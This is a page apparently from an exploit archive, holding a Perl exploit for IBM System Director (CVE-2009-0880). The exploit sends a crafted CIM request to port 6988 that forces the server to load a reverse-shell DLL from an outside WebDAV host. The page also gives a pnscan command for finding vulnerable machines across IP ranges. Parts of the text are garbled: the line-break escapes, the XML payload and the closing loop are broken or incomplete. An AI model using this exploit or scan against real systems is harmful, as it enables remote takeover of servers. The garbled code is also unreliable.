[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IBM System Director Remote System Level Exploit
# Published : 2012-12-02
# Author :
# Previous Title : MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
# Next Title : KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability

IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope

IBM System Director has the port 6988 open. By using a special request
to a vulnerable server,
the attacker can force to load a dll remotely from a WebDAV share.

The following exploit will load the dll from
the wootwoot.dll is a reverse shell that will send a shell back to the
attacker (the code has to be inside the dll initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not
on 5.2.30 SP2 and above.
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880
There was a prior CVE for it, the CVE states the attack can load local
files only, using the WebDAV server remote file can be loaded too.
To scan for this software you can enter the following (by using pnscan):
./pnscan -w"M-POST /CIMListener/ HTTP/1.1rnHost:
localhostrnContent-Length: 0rnrn" -r HTTP <ipblock> 6988

use IO::Socket;
#1st argument: target host
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "6988",
                                 Proto    => 'tcp');
$payload =
qq{<?xml version="1.0" encoding="utf-8" ?>
    <EXPMETHODCALL NAME="ExportIndication">
     <EXPPARAMVALUE NAME="NewIndication">
      <INSTANCE CLASSNAME="CIM_AlertIndication" >
        <PROPERTY NAME="Description" TYPE="string">
          <VALUE>Sample CIM_AlertIndication indication</VALUE>
        <PROPERTY NAME="AlertType" TYPE="uint16">
        <PROPERTY NAME="PerceivedSeverity" TYPE="uint16">
        <PROPERTY NAME="ProbableCause" TYPE="uint16">
        <PROPERTY NAME="IndicationTime" TYPE="datetime">
$req =
"M-POST /CIMListener/\\isowarez.de\director\wootwoot HTTP/1.1rn"
."Host: $ARGV[0]rn"
."Content-Type: application/xml; charset=utf-8rn"
."Content-Length: ". length($payload) ."rn"
."Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40rn"
."CIMOperation: MethodCallrn"
."CIMExport: MethodRequestrn"
."CIMExportMethod: ExportIndicationrnrn";
print $sock $req . $payload;

while(<$sock>) {